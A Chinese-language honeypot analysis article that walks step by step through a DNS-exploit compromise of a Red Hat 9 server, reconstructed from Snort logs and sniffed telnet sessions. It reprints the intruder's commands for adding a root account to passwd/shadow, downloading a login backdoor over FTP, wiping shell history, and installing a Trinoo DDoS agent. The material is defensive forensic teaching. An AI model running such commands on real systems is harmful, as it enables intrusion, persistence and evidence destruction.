系統監控:蜜罐分析技術
前言
本文我將要討論的是對一個被入侵的系統進行逐步地研究,而工具和入侵技術不作為重點。我們將集中精力討論如何把信息拼揍在一起,來分析到底發生了什么事情。我寫這篇文章其目的是幫你在安全領域工作中,如何面對企業或組織所遭到的威脅做斗爭。
背景
我在這里介紹的信息是通過一個蜜罐技術而獲得的。這個蜜罐是安裝Red Hat 9的服務器。我對它進行默認安裝并沒有作出任何修改,所以這里討論的漏洞都會存在于任何預設安裝的Red Hat 9服務器中。另外,所有IP地址、用戶賬戶和終端字符在這里都是真實的,這樣做對于驗證數據并給予分析有著更好的了解。Snort是我的嗅探器并且對于其靈活性、功能和價格(免費),它也是作為入侵檢測系統的最佳選擇。入侵者采取的所有行動都會被Snort捕捉。另外,在整篇文章中,入侵者的性別已被確定為女性,至于如何獲取入侵者的性別我不會在此提及到。
入侵
在11月26日的早晨6點43分,Snort提醒我,我的一個系統遭到了noop攻擊。數據包的有效載荷包含noop,它是一個緩沖區溢出攻擊的跡象。在這種情況下,Snort已記下了攻擊的記錄,它存放在/var/log/messages文件內。注意:172.16.1.107是蜜罐的IP地址。所有其他系統的IP地址均為入侵者所使用的IP地址。
Nov 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
我的蜜罐接受著無數次探測、掃描。然而,這樣的提醒使我注意到,它可能表明系統已被破壞。果然,不到兩分鐘,攻擊者就建立了連接,系統日志顯示系統被破解。
Nov 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)
Nov 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)
入侵者獲得了超級用戶的權限,而且正在控制著系統。這是怎么完成的,究竟發生了什么?我們現在就開始進行分析,把它們拼在一起,一步一步來。
分析
然而我們進行分析過程中,如何知道入侵者從哪里開始的呢?入侵者通常從信息收集開始,他們需要確定目標系統存在什么漏洞。如果你的系統受到了破壞,這通常表明入侵者已不止一次與你的系統進行溝通。入侵之前大部分都涉及一些收集資料的操作。因此,對于入侵者的信息收集階段,也是我們的開始。
如果我們從上述情報來看,這次入侵發生在53端口。這表明我們的系統遭到了DNS攻擊。因此,我會通過Snort開始尋找情報,并尋找DNS信息的探測。我們發現DNS版本探測信息是從同一個系統發來的。
Nov 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Nov 25 02:08:07 lisa snort[5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
注意探測的數據,即11月25日。我們的系統是11月26日被攻破,來自同一個系統。而入侵者只花費簡短的時間就把系統攻破,我猜測,它是一種自動化工具,是入侵者用來掃描眾多系統已知DNS漏洞的工具。掃描后離開,當入侵者審查結果后確定了存在漏洞的系統(包括我們),然后開始她的發揮。現在我們已經拼湊起來了我們故事的第一部分。入侵者11月25日對我們的系統探測,然后第二天該系統被利用。根據我的IDS情報,似乎是由同一個DNS漏洞的腳本小子擊中。但她如何發動入侵的,它是如何工作的?請繼續看下面。
漏洞
像大多數商業IDS系統一樣,Snort可以顯示我們的所有IP數據包。我們將使用此功能進行分析漏洞。該漏洞的信息是從Snort的日志獲取的(由Tcpdump二進制格式轉儲)。我沒有限制我對主機63.236.81.13的查詢,因為入侵者可能使用其他系統。其實是這樣的,因為入侵者至少使用三種不同的系統來執行漏洞利用(這是我的經驗)。該漏洞的目標是獲取遠程系統上的一個Root Shell。一旦入侵者獲得一個Root shell,她們就可以運行任何root命令,請看下面運行的命令。
cd /; uname -a; pwd; id;
Linux apple 2.4.18-1.4 #1 Sun Nov 29 22:21:09 GMT 2009 i686 unknown
/
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
echo "twin::506:506::/home/twin:/bin/bash" >> /etc/passwd
echo "twin:w3nT2H0b6AjM2:::::::" >> /etc/shadow
echo "hantu::0:0::/:/bin/bash" >> /etc/passwd
echo "hantu:w3nT2H0b6AjM2:::::::" >> /etc/shadow
入侵者以root身份運行多個命令。首先,她證實了她的系統(uname -a),目錄(pwd),然后確認自己的UID(id)。然后她將兩個賬戶twin和hantu都設置為相同的密碼。請注意,twin的UID有兩個506,hantu的UID有兩個0。記住,大多數系統不讓UID 0 telnet到窗口中。于是,她創建一個賬戶,因為她這樣就能夠遠程訪問。因此,入侵者將執行Dns漏洞利用從而獲得一個root shell,然后插入兩個賬戶。她通過漏洞利用并在telnet窗口中獲取root權限僅僅花費了90秒鐘。那么,她下一步將作什么?
Nov 26 06:43:05 lisa snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Nov 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user twin by (uid=0)
Nov 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user hantu by twin(uid=506)
獲取
幸運的是,Telnet是一種以明文數據傳遞的協議,數據沒有加密。這就意味著我們能夠通過嗅探器跟蹤和捕獲她的所有擊鍵。Snort已經為我們做到了這一點。通過分析捕捉到的telnet會話,我們就如入侵者一樣,因為我們捕捉的不僅僅是STDIN(擊鍵),還有STDOUT和STDER。分析telnet會話后并確定了入侵者的活動。
首先,我們的“朋友”telnet(來自于213.28.22.189)到twin,然后獲得超級用戶hantu。記住,她不能telnet到具有UID 0的hantu,因為對于遠程訪問這將受到限制。
#' !"'!"# ' 9600,9600'VT5444VT5444
Red Hat Linux release 9
Kernel 2.4.18-1.4 on an i686
login: twin
Password: Password: hax0r
No directory /home/twin!
Logging in with home = "/".
[twin@apple /]$ su hantu
Password: Password: hax0r
第二步,我們的“朋友”FTP到其它服務器中來拿取她的工具包。
[root@apple /]# ftp 24.112.167.35
Connected to 24.112.167.35.
220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.
Name (24.112.167.35:twin): welek
331 Password required for welek.
Password:password
230 User welek logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get bj.c
local: bj.c remote: bj.c
200 PORT command successful.
150 Opening BINARY mode data connection for bj.c (1010 bytes).
226 Transfer complete.
1010 bytes received in 0.115 secs (8.6 Kbytes/sec)
ftp> quit
221-You have transferred 1010 bytes in 1 files.
221-Total traffic for this session was 1421 bytes in 1 transfers.
221-Thank you for using the FTP service on linux.
221 Goodbye.
第三步,她獲得了她的后門程序,編譯bj.c并安裝在/sbin/login以將它替換。請注意所有命令提示符下執行命令的編譯。
[root@apple /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c
bj.c:16: unterminated string or character constant
bj.c:12: possible real start of unterminated constant
她現在試圖執行已編譯的后門程序。
[root@apple /]# chown root:bin login
chown: login: No such file or directory
[root@apple /]# chmod 4555 login
chmod: login: No such file or directory
[root@apple /]# chmod u-w login
chmod: login: No such file or directory
[root@apple /]# cp /bin/login /usr/bin/xstat
[root@apple /]# cp /bin/login /usr/bin/old
[root@apple /]# rm /bin/login
[root@apple /]# chmod 555 /usr/bin/xstat
[root@apple /]# chgrp bin /usr/bin/xstat
[root@apple /]# mv login /bin/login
mv: login: No such file or directory
[root@apple /]# rm bj.c
可愛的朋友,她這次沒有得到正確的結果,再試一次。她從FTP站點重新下載了后門程序。
[root@apple /]# ftp 24.112.167.35
Connected to 24.112.167.35.
220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.
Name (24.112.167.35:twin): [root@apple /]# ftp 24.112.167.35
Connected to 24.112.167.35.
220 linux FTP server (Version wu-2.5.0(1) Sat Nov 21 16:48:12 GMT 2009) ready.
Name (24.112.167.35:twin): welek
331 Password required for welek.
Password:331 Password required for welek.
Password:password
230 User welek logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get bj.c
qulocal: bj.c remote: bj.c
200 PORT command successful.
u150 Opening BINARY mode data connection for bj.c (1011 bytes).
226 Transfer complete.
1011 bytes received in 0.134 secs (7.3 Kbytes/sec)
ftp> itit
221-You have transferred 1011 bytes in 1 files.
221-Total traffic for this session was 1422 bytes in 1 transfers.
221-Thank you for using the FTP service on linux.
221 Goodbye.
現在是她編譯后門程序的第二次嘗試。請注意相同的剪切和粘貼命令使用。
[root@apple /]# gcc -o login bj.cchown root:bin loginchmod 4555 loginchmod u-w logincp /bin/login /usr/bin/xstatcp /bin/login /usr/bin/old rm /bin/loginchmod 555 /usr/bin/xstatchgrp bin /usr/bin/xstatmv login /bin/loginrm bj.cgcc -o login bj.c
bj.c: In function `owned':
bj.c:16: warning: assignment makes pointer from integer without a cast
現在我們看到編譯的后門程序已經實施。有效的/bin/login副本移動到/usr/bin/xstat中,而編譯的后門程序bj.c用于替換/bin/login,這是后門程序。
[root@apple /]# chown root:bin login
[root@apple /]# chmod 4555 login
[root@apple /]# chmod u-w login
[root@apple /]# cp /bin/login /usr/bin/xstat
cp: /bin/login: No such file or directory
[root@apple /]# cp /bin/login /usr/bin/old
cp: /bin/login: No such file or directory
[root@apple /]# rm /bin/login
rm: cannot remove `/bin/login': No such file or directory
[root@apple /]# chmod 555 /usr/bin/xstat
[root@apple /]# chgrp bin /usr/bin/xstat
[root@apple /]# mv login /bin/login
現在她開始清除她的活動痕跡。我認為這是一個腳本,剪切和粘貼。看看她執行的所有命令。另外,我確信這是一個“generic”清理腳本,注意它是如何試圖刪除文件(如/tmp/h)的。
[root@apple /]# rm bj.c
[root@apple /]# [root@apple /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/ sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb in/named
359 ? 00:00:00 inetd
359 ? 00:00:00 inetd
rm: cannot remove `/tmp/h': No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
[root@apple /]# ps -aux | grep portmap
[root@apple /]# [root@apple /]# ps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sbin/namedps -aux | grep inetd ; ps -aux | grep portmap ; rm /sbin/por<grep inetd ; ps -aux | grep portmap ; rm /sbin/port map ; rm /tmp/h ; rm /usr<p portmap ; rm /sbin/portmap ; rm /tmp/h ; rm /usr/ sbin/rpc.portmap ; rm -rf<ap ; rm /tmp/h ; rm /usr/sbin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.ba<bin/rpc.portmap ; rm -rf .bash* ; rm -rf /root/.bas h_history ; rm -rf /usr/s<bash* ; rm -rf /root/.bash_history ; rm -rf /usr/sb in/named
359 ? 00:00:00 inetd
rm: cannot remove `/sbin/portmap': No such file or directory
rm: cannot remove `/tmp/h': No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
[root@apple /]# rm: cannot remove `/sbin/portmap': No such file or directory
我發現了一些有意思的事情。入侵者通過generic進行清理,但腳本出現了錯誤,因為它試圖刪除的文件根本不存在。我認為我們的“朋友”一定看到了這些錯誤信息,因為她當時在試圖手工刪除這些相同的文件,即使它們不存在。
rm: cannot remove `/tmp/h': No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
[root@apple /]# rm: cannot remove `/sbin/portmap': No such file or directory
rm: cannot remove `/tmp/h': No such file or directory
rm: cannot remove `/usr/sbin/rpc.portmap': No such file or directory
[root@apple /]# exit
exit
[twin@apple /]$ exit
logout
就這樣,我們的“朋友”安置了一個后門程序,即bj.c。完成之后,她就立刻從我的系統中退出了。
返回
此系統遭到破壞之后,我把它脫機并進行數據審查(比如Tripwire)。不過,我在下周看到了各種系統正試圖Telnet到此機器上。顯然,那個入侵者回來了,最有可能的是會對我的系統進行更多的邪惡活動。所以,我將此破壞過的機器繼續接入因特網,好奇地看看入侵者,她會做什么?果然,近兩個星期后,她回來了。我再次使用Snort捕捉她的所有按鍵。看看下面的telnet會話,并研究如何破壞系統,我們將作為Trinoo終端使用。
在12月9日的上午10:45,我們的“朋友”從24.7.85.192發起了telnet會話。注意她是如何使用后門程序繞過身份驗證而進入系統的。
!"' #'!"# ' 9600,9600'VT9111VT9111
Red Hat Linux release 9
Kernel 2.4.18-1.4 on an i686
[root@apple /]# ls
bin cdrom etc home lost+found proc sbin usr
boot dev floppy lib mnt root tmp var
一旦登入系統,她就嘗試使用DNS。
[root@apple /]# nslookup magix
[root@apple /]# nslookup irc.powersurf.com
Server: zeus-internal.uicmba.edu
Address: 172.16.1.101
我們的“朋友”FTP到位于新加坡的一個系統并下載一個新的工具包。注意隱藏的目錄.s,她創建了存儲工具。
[root@apple /]# mkdir .s
[root@apple /]# cd .s
[root@apple /.s]# ftp nusnet-216-35.dynip.nus.edu.sg
ftp: nusnet-216-35.dynip.nus.edu.sg: Unknown host
ftp> qquituit
[root@apple /.s]# ftpr 137.132.216.35
login: ftrp: command not found
[root@apple /.s]#
[root@apple /.s]# ftp 137.132.216.35
Connected to 137.132.216.35.
220 nusnet-216-35.dynip.nus.edu.sg FTP server (Version wu-2.4.2-VR17(1) Thu Nov 19 09:21:53 GMT 2009) ready.
她在我們的窗口中插入相同的用戶名,從而獲得了訪問權限。
Name (137.132.216.35:root): twin
331 Password required for twin.
Password:hax0r
230 User twin logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get d.tar.gz
local: d.tar.gz remote: d.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
150 Opening BINARY mode data connection for d.tar.gz (8323 bytes).
226 Transfer complete.
8323 bytes received in 1.36 secs (6 Kbytes/sec)
ftp> quit
221-You have transferred 8323 bytes in 1 files.
221-Total traffic for this session was 8770 bytes in 1 transfers.
221-Thank you for using the FTP service on nusnet-216-35.dynip.nus.edu.sg.
221 Goodbye.
[root@apple /.s]# gunzip d*
[root@apple /.s]# tar -xvf d*
daemon/
daemon/ns.c
daemon/ns
[root@apple /.s]# rm -rf d.tar
[root@apple /.s]# cd daemon
[root@apple daemon]# chmod u+u+x nsx ns
[root@apple daemon]# ./ns
入侵者剛剛安裝并啟動了Trinoo終端。下一步,她試圖調換受損的系統。注意,她是如何設置她的VT TERM。這個系統很可能也有一個后門。連接失敗,因為DNS不能正常工作。
[root@apple daemon]# TERM=vt1711
[root@apple daemon]# telnet macau.hkg.com
macau.hkg.com: Unknown host
[root@apple daemon]# exit
exit www.2cto.com
我們的“朋友”離開了,只是回到了以前的系統(137.132.216.35),并嘗試更多可愛的調皮行為。
!"' #'!"# ' 9600,9600'VT9111VT9111
Red Hat Linux release 9
Kernel 2.4.18-1.4 on an i686
apple /]# TERM=vt9111
telnet ns2.cpcc.cc.nc.us
ns2.cpcc.cc.nc.us: Unknown host
@apple /}#telnet 1 152.43.29.52
Trying 152.43.29.52...
Connected to 152.43.29.52.
Escape character is '^]'.
!!!!!!Connection closed by foreign host.
te8ot@apple /]# TERM=vt7877
[root@apple /]# telnet sparky.w
itoot@apple /]# exit
exit
在此之后,不少人認為以此作為傀儡機對其他系統發起攻擊,入侵者打算利用此系統從事更多的破壞活動。因此,我關閉了系統。
Dec 9 11:03:20 lisa snort[2370]: IDS/197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
Dec 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
Dec 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
Dec 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
Dec 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
Dec 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335
尾聲
我已經詳細論述了我的蜜罐是如何一步一步被攻破的,起初使用后門程序,最后使用Trinoo攻擊。11月25日,入侵者先掃描蜜罐的DNS運行著哪一版本。第二天,也就是11月26日,她執行了NXT-Howto,并成功獲得了root shell。她獲得了一個root shell之后,就創建了兩個系統賬戶,即twin和hantu。在此之后,她立即打開telnet窗口,獲得超級用戶的訪問權限,然后下載并安置了她的后門程序bj.c。然后她執行一個腳本來掩飾她在系統中留下的痕跡,然后她在幾周之后又試圖連接我的系統,但它處于脫機狀態。最后,在12月9日那天,她進行了訪問、安裝、然后執行Trinoo。就在此時,我把蜜罐脫機了。
我剛剛涵蓋了分析蜜罐的所有步驟。目標是,以確定如何使用入侵檢測系統和日志進行分析被攻破的系統。通過這種分析方法,你應該對分析被攻擊的系統有更好的理解。如果你想了解更多有關知識,你可以通過Email(Hack01[at]Live.cn)與我交流。
最后我還要感謝所有地下組織成員的貢獻,在一些特殊任務中,沒有他們的辛勤工作和交流是不可能完成的。
